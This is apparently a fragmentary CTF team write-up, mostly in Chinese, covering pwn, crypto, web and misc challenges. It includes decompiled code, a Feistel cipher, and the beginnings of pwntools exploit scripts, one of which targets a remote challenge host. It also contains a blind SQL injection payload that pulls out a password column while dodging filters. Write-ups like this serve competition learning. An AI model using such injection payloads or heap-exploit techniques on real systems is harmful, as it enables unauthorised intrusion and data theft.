## [Pwn] Null - Cpt.shao

 for ( i = 0LL; ; i += v3 )  {    result = i;    if ( i >= size )      break;    v3 = read(0, (void *)(heap_ptr + i), size);    if ( v3 <= 0 )    {      write(1, "I/O error\n", 0xAuLL);      sub_400AD6(1u);    }  }

## [Misc] APFS - sherlly

，猜想是提取快照前后的文件修改时间进行异或，得到flag，但是提取9位纳秒进行异或后没有看到什么有价值的信息。

## [PPC] mathGame - CirQ

from pwn import *from hashlib import sha256from string import *from math import sqrtfrom itertools import pro

## [Web] 77777 2 - pyz

### 主要代码

2可以用1+1代替，如此类推，pw)只要在中间加空格就可绕过

flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10))

## [Crypto] baby_N1ES - CirQ

def encrypt(self, plaintext):    if (len(plaintext) % 16 != 0 or isinstance(plaintext, bytes) == False):        raise Exception("plaintext must be a multiple of 16 in length")    res = ''    for i in range(len(plaintext) / 16):        block = plaintext[i * 16:(i + 1) * 16]        L = block[:8]        R = block[8:]        for round_cnt in range(32):            L, R = R, (round_add(L, self.Kn[round_cnt]))        L, R = R, L        res += L + R    return resdef decrypt(self, ciphertext):    if (len(ciphertext) % 16 != 0 or isinstance(ciphertext, bytes) == False):        raise Exception("ciphertext must be a multiple of 16 in 

## [PWN]Beeper - Cpt.shao

heap1 = 0x57010heap2 = 0x57030case: '1' : --*heap2;case: 'L' : ++*heap2;case: 'N' : *heap2 = *heap1case: 'a' : --*heap1;case: 'h' : ++inputcase: 'm' : ++*inputcase: 'o' : --inputcase: 'r' : ++*heap1case: 'u' : --*inputcase: [] : input ? execute: skipcase: {} : heap2 ? execute: skip

remove(0);remove(2);remove(0)

## Run.py

from pwn import *LSHIFT = 'o' # --iRSHIFT = 'h' # ++iINC = 'm' # ++ (*i)DEC = 'u' # -- (*i)context.arch='amd64'password = '\x86\x13\x81\tb\xffD\xd3?\xcd\x19\xb0\xfb\x88\xfd\xae \xdf' + '\x00'*85context.log_level = 'debug'# p = process('./beep

## [PWN]Vote - Cpt.shao

struct user{  __int64 count;  __int64 time;  __int64 name;};

malloc一个unsortedbin大小的chunk然后free掉，通过show函数就能泄露一个libc地址。

## vote.py

from pwn import *import timeenv = {'LD_PRELOAD': './libc-2.23.so'}# p = process('./vote', env=env)p = remote('47.97.190.1', 6000)libc = ELF('./libc-2.23.so')context.log_level = 'debug'def create(size, name):    p.sendlineafter('Action: ', '0')    p.sendlineafter(': ', str(s